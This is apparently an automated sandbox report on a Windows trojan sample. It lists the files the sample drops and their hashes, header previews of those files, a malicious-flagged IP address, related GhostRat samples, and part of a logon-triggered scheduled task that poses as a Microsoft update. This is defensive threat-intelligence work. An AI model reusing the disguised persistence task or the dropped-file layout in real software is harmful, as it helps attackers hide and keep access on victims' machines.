    6f0slJzOrF.exe39%ReversingLabsWin32.Ransomware.Generic
    SourceDetectionScannerLabelLink
    C:\Users\Public\Bilite\Axialis\Update.dll78%ReversingLabsWin32.Trojan.Generic
    C:\Users\Public\Bilite\Axialis\Update.exe0%ReversingLabs
    C:\Users\Public\Bilite\winrar-x64-700scp.exe0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\backup.dll78%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Temp\backup.exe0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://ion=v4.50%Avira URL Cloudsafe
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.2606826646.0000000005614000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2609988130.00000000052D4000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://crl.micropowershell.exe, 00000011.00000002.2618375019.0000000007CD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2615239555.0000000006D17000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000011.00000002.2595466540.0000000004D5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2595466540.0000000004705000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://aka.ms/pscore6lBpowershell.exe, 00000011.00000002.2595466540.00000000045B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2595617657.0000000004271000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://crl.microsoftpowershell.exe, 00000012.00000002.2621611408.0000000007D97000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://ion=v4.5powershell.exe, 00000012.00000002.2621548933.0000000007D75000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.2595466540.0000000004D5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2595466540.0000000004705000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/powershell.exe, 00000012.00000002.2609988130.00000000052D4000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.2606826646.0000000005614000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2609988130.00000000052D4000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000012.00000002.2609988130.00000000052D4000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Iconpowershell.exe, 00000012.00000002.2609988130.00000000052D4000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.2595466540.00000000045B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2595617657.0000000004271000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://aka..winsvrpowershell.exe, 00000012.00000002.2615239555.0000000006CFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    154.82.85.79
                                    unknownSeychelles
                                    32708ROOTNETWORKSUStrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1582215
                                    Start date and time:2024-12-30 03:42:13 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 33s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Run name:Run with higher sleep bypass
                                    Number of analysed new started processes analysed:29
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:6f0slJzOrF.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:E0B31F24AA1B867B395D4F62F15DC51A.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@43/29@0/1
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 98%
                                    • Number of executed functions: 164
                                    • Number of non-executed functions: 191
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 1396 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 5344 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    No simulations
                                    No context
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ROOTNETWORKSUSm68k.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 156.236.225.1
                                    Installer eSPT Masa PPh versi 2.0#U007e26022009.exeGet hashmaliciousBlackMoonBrowse
                                    • 154.82.113.139
                                    Installer eSPT Masa PPh versi 2.0#U007e26022009.exeGet hashmaliciousBlackMoonBrowse
                                    • 154.82.113.139
                                    MicrosoftEdgeUpdateSetup.exeGet hashmaliciousUnknownBrowse
                                    • 154.82.68.34
                                    nshkarm5.elfGet hashmaliciousMiraiBrowse
                                    • 154.94.148.181
                                    x86.elfGet hashmaliciousUnknownBrowse
                                    • 154.82.151.143
                                    bot.x86.elfGet hashmaliciousMiraiBrowse
                                    • 38.145.246.125
                                    nsharm7.elfGet hashmaliciousMiraiBrowse
                                    • 156.236.225.1
                                    akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                    • 154.94.130.206
                                    jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                    • 154.82.254.162
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\Public\Bilite\Axialis\Update.exezPJUOck9wt.exeGet hashmaliciousGhostRatBrowse
                                      zPJUOck9wt.exeGet hashmaliciousUnknownBrowse
                                        MEuu1a2o6n.exeGet hashmaliciousGhostRatBrowse
                                          MEuu1a2o6n.exeGet hashmaliciousUnknownBrowse
                                            Process:C:\Users\user\Desktop\6f0slJzOrF.exe
                                            File Type:openssl enc'd data with salted password, base64 encoded
                                            Category:dropped
                                            Size (bytes):56
                                            Entropy (8bit):5.074862957617357
                                            Encrypted:false
                                            SSDEEP:3:iqkCdV1YgPPfShdDHqY:ilVgPPfSrDHj
                                            MD5:6E39ED9B20EC66F4A15F676643E817B7
                                            SHA1:00BB683B434109DB7F92D5EC0A8C1624B8DDD76A
                                            SHA-256:8B51398F2ECF48BE517D1C4D35A5A423E506EBD98A04666DDA316FA73EFD708F
                                            SHA-512:418E6D9EEBB9B5A01FD0DDCCD6A899DACACE55332157DE46F1835AB590CE9F6CC70A877CFA40236648925218FCDFB7A6C8E240A9772687F7B5D90A53BCD6D196
                                            Malicious:false
                                            Preview:U2FsdGVkX1/SU80PltnAuPjjzlWfLAoH0tdbM+zlnff/LmxqUYBY5A==
                                            Process:C:\Users\user\Desktop\6f0slJzOrF.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):2180096
                                            Entropy (8bit):6.630734298081442
                                            Encrypted:false
                                            SSDEEP:49152:5s5wTerN66bKTfixsRJHmYOmsMUEQ8keZ4E/Q46H+be9BMH8kCU:u5wTep66bKTasRRVOtZ58keZ4ET6H+bB
                                            MD5:D4B2DBE4B2D1D05553F6A479AC91CC0B
                                            SHA1:2FF3DF81CD215C338EFA57FE7C9E84F7FD74BD81
                                            SHA-256:A3EF22F2D5F70B6ACE17DCD6B06F297E9D1B5D83708A14B457A47AA8322CF6AC
                                            SHA-512:54B58F2F102BAECD557725D710059E46947188292C9BFD380BDADD735A79BEDA44533C48C238A9F3A5304C5AA5DB5321330EE66A729A0584D42EE895A1F68B9E
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 78%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....kg...........!.........&................................................!...........@.........................XC..O....C..h....P...G.......................-...1...............................................N...............................text............................... ..`.rdata...M...0...N..................@..@.data...8........^...l..............@....00cfg.......0......................@..@.tls.........@......................@....rsrc....G...P...H..................@..@.reloc...-..........................@..B................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\6f0slJzOrF.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):395368
                                            Entropy (8bit):5.090673225697451
                                            Encrypted:false
                                            SSDEEP:6144:I0acLF3rgypB1Grf/TRfiJ7BePaEvLJggZy:Y/TRfi3ePtJRg
                                            MD5:FB325C945A08D06FE91681179BDCCC66
                                            SHA1:F5D91B7D75D34E156066AB4099E0FD0DF9227B32
                                            SHA-256:0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
                                            SHA-512:2BB588EBE2FA35D03652AEC4E5D51DABD3A24E996336A4D5EC9C762D6084862D5CD5F530F1DA0B98D2887BA88F4E077697D128071FF497D2967F9F42ADC2F533
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: zPJUOck9wt.exe, Detection: malicious, Browse
                                            • Filename: zPJUOck9wt.exe, Detection: malicious, Browse
                                            • Filename: MEuu1a2o6n.exe, Detection: malicious, Browse
                                            • Filename: MEuu1a2o6n.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[...[...[...#l..[.......[.......[.......[.......[..b....[..e....[...0...[...[...[..e....[..e....[...[h..[..e....[..Rich.[..........................PE..L...X..e............................\........ ....@..................................8....@.................................D(.......@..................h(...........!..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\6f0slJzOrF.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):67743960
                                            Entropy (8bit):7.999995177123799
                                            Encrypted:true
                                            SSDEEP:1572864:m9dsnu4FYxGsrFKHPbGmHb6xX5JsSiD7LX:m9qnSePbfx7r
                                            MD5:095764E4AD28A2BBDEAA8165DDB32305
                                            SHA1:BAC7FE65D7A4D6D114778E45B9099735C041C9B4
                                            SHA-256:E9EEE49B8663B52ED03FE9344DE5225742D36C5FDEA82671C0887F221DD98C17
                                            SHA-512:7CEB023DBB39325896EC20920BE05C09C9A10B5B4499F9189E0056C320A5EC98BA1B1E42CA68E8C15EE303C3A94A46CB5A237BB52B84B215A018A396825F97CB
                                            Malicious:false
                                            Preview:..>..9..x...@....)..b.;.G.....k...L$Q....{C[..........*}......2.'.....d,........5..=1@.`o.R.4..E..N].ZG.;.W...G.._.Q<...7........p.>Nd.........>....y..........x..J.t.@K.W....=.7.@..u2=o..........y.'...Y..K.W.k.@}...Z.:.|........:...g.k.......#m.q.mU.'.d..!.......i?.....q..ZZ.<..p.q.......;..C..k.|F!L..........U|x.u...?....@yyL.%AG`.\.r.=.............MB.Fy"~..2s.h......a..,..0...Mo...H.yM&(I.Aq.:.3sH:.oC..i......S..._.^]...w.r...:..L......q.....1..h.....M....\....Q..V...2...~.w.D8UzQ.p.$.1l...'v.3..E........:.v...%MCp.c.W.B...=.NUW..Dl.Mg.,.......<..].....4%r..%.....l...T...z..4...f.e...#.6..-..+.o...M.].7...uP7..K.f......t1..f.......cH}/%1.~v&2*..8..(.F...A.2...D....VM.m.ZF.R....;z.pF@...,..[H..PU..I...BT...w......Y..N.m.f.l'....\.....l5.....ZwY.^c6 L..J~5...6K.!\....CL..r>..L....&.~.r..r$.C.%E..!.W...E#.".....}...4<;6^@........+..........~O..=..*...{m.t.WG..8J...m...X...........+;.P.....Ds..m.X......F.f.u.`t..<.smB.
                                            Process:C:\Users\user\Desktop\6f0slJzOrF.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):4106352
                                            Entropy (8bit):7.958994203647152
                                            Encrypted:false
                                            SSDEEP:98304:2WaVOBfKP4QT41wUbqTA0AxVSYIuU+LzmTOYOM2IJ7lETr3dwBkR173n:Xa7gQ1Oqk0AxVSN4zwl2IdlUNbRp
                                            MD5:213C4AD2CCE43FE07E748FA50D91BDAC
                                            SHA1:3FBE73E57594FDBCEA8A2C2631DE1F4789DC5293
                                            SHA-256:902098CA985B2E6703CFC53BDB0A41D01AB461130668694742B1BB8F1D149C36
                                            SHA-512:189B13030662CF3B58254519EE267CF832B98EC828BCB269D69DB32597583455EF2E6DDD9F87877CCF292D77E14D5C64720217E99992CCC3F53BAF98420A5051
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u...u...u...v...u...p.P.u.J.....u.J.q...u.J.v...u.J.p...u...q...u...s...u...t...u...t...u.D.|...u.D.u...u.D.....u.D.w...u.Rich..u.........................PE..d....S.e.........."....!."..........`..........@.............................0........?...`.........................................PO..4....O..P.......dZ...`...?....>..(... ..D...@...T.......................(....M..@............@......,A.......................text...N!.......".................. ..`.rdata... ...@..."...&..............@..@.data........p.......H..............@....pdata...?...`...@...Z..............@..@.didat..8...........................@..._RDATA..\...........................@..@.rsrc....`.......\..................@..@.reloc..D.... ......................@..B................................................................................................................................
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1360
                                            Entropy (8bit):5.402858173152827
                                            Encrypted:false
                                            SSDEEP:24:36WSKco4KmBs4RPT6BmFoUebIKomjKcmZ9tXt/NK3R88bJ02r2W3b2:KWSU4y4RQmFoUeWmfmZ9tlNWR832qab2
                                            MD5:AF36592F85D7B7C543EFF5FDFA110A05
                                            SHA1:927E58BBC8A0B4BB43A2FF92E414C06A734F891A
                                            SHA-256:FEFFCA6FA7A5138800281624215FF083CC7086BEC9F51306EAC661FAB8552594
                                            SHA-512:1D9DBA6C62C84F8C34E74E92F42D399C46929E35752205BCAFBBC2046C8B6223A3D0A08146418256A66AAC932DFF9C9A919168A0CCD087D8CD2720DAE7EC5EF0
                                            Malicious:false
                                            Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                            Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1893
                                            Entropy (8bit):5.212287775015203
                                            Encrypted:false
                                            SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                            MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                            SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                            SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                            SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):2180096
                                            Entropy (8bit):6.630734298081442
                                            Encrypted:false
                                            SSDEEP:49152:5s5wTerN66bKTfixsRJHmYOmsMUEQ8keZ4E/Q46H+be9BMH8kCU:u5wTep66bKTasRRVOtZ58keZ4ET6H+bB
                                            MD5:D4B2DBE4B2D1D05553F6A479AC91CC0B
                                            SHA1:2FF3DF81CD215C338EFA57FE7C9E84F7FD74BD81
                                            SHA-256:A3EF22F2D5F70B6ACE17DCD6B06F297E9D1B5D83708A14B457A47AA8322CF6AC
                                            SHA-512:54B58F2F102BAECD557725D710059E46947188292C9BFD380BDADD735A79BEDA44533C48C238A9F3A5304C5AA5DB5321330EE66A729A0584D42EE895A1F68B9E
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 78%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....kg...........!.........&................................................!...........@.........................XC..O....C..h....P...G.......................-...1...............................................N...............................text............................... ..`.rdata...M...0...N..................@..@.data...8........^...l..............@....00cfg.......0......................@..@.tls.........@......................@....rsrc....G...P...H..................@..@.reloc...-..........................@..B................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):395368
                                            Entropy (8bit):5.090673225697451
                                            Encrypted:false
                                            SSDEEP:6144:I0acLF3rgypB1Grf/TRfiJ7BePaEvLJggZy:Y/TRfi3ePtJRg
                                            MD5:FB325C945A08D06FE91681179BDCCC66
                                            SHA1:F5D91B7D75D34E156066AB4099E0FD0DF9227B32
                                            SHA-256:0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
                                            SHA-512:2BB588EBE2FA35D03652AEC4E5D51DABD3A24E996336A4D5EC9C762D6084862D5CD5F530F1DA0B98D2887BA88F4E077697D128071FF497D2967F9F42ADC2F533
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[...[...[...#l..[.......[.......[.......[.......[..b....[..e....[...0...[...[...[..e....[..e....[...[h..[..e....[..Rich.[..........................PE..L...X..e............................\........ ....@..................................8....@.................................D(.......@..................h(...........!..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):769
                                            Entropy (8bit):5.113976261619789
                                            Encrypted:false
                                            SSDEEP:24:NFW/WAW/WAWE3fzWcWrfZKx31SIYaYZLZ6y:NFVAVAjvz6ZKx31SIYN/6y
                                            MD5:F7F23953F7C236A0F12AE4848F174480
                                            SHA1:E222C191BE437B39FB294EDD1FCCAF961B1F7265
                                            SHA-256:0CD1B31F9AA2F089BD33331B172CD4813167BD59F889EFDC7EB2ADAA71F3D9CC
                                            SHA-512:2790AFD071756E25FF408426E0D40879603EBCBC23C1D98AD891017237A2930F27CC19F28C38C5BAB5221E828B0B08727EDCEC1D2AA528FCCED0B7EE576836B8
                                            Malicious:false
